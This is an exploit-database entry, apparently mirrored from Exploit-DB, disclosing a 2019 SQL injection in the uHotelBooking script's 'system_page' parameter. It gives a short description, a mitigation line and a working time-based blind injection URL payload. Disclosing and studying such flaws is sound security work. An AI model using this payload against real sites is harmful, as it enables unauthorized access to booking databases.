header-logo
Suggest Exploit
vendor:
uHotelBooking
by:
Ahmet Ümit BAYRAM
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: uHotelBooking
Affected Version From: Lastest
Affected Version To: Lastest
Patch Exists: NO
Related CWE: N/A
CPE: a:hotel-booking-script:uhotelbooking
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2019

uHotelBooking System – ‘system_page’ SQL Injection

uHotelBooking is a powerful hotel management and online booking/reservation site script. The vulnerability exists due to improper validation of user-supplied input in the 'system_page' parameter of the 'index.php' script. A remote attacker can send a specially crafted HTTP request to execute arbitrary SQL commands in application's database.

Mitigation:

Input validation should be performed to ensure that untrusted data is not used to construct SQL commands that can be executed.
Source

Exploit-DB raw data:

# Exploit Title: uHotelBooking System - 'system_page' SQL Injection
# Date: 21.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.hotel-booking-script.com
# Demo Site: https://www.hotel-booking-script.com/demo/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
# Description: uHotelBooking is a powerful hotel management and online
booking/reservation site script.

----- PoC: SQLi -----

Request: http://localhost/[PATH]/index.php
Vulnerable Parameter: system_page (GET)
Attack Pattern:
http://locahost/[PATH]/index.php?page=3&system_page=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z

Navigation

Suggest Exploit

Services By CQR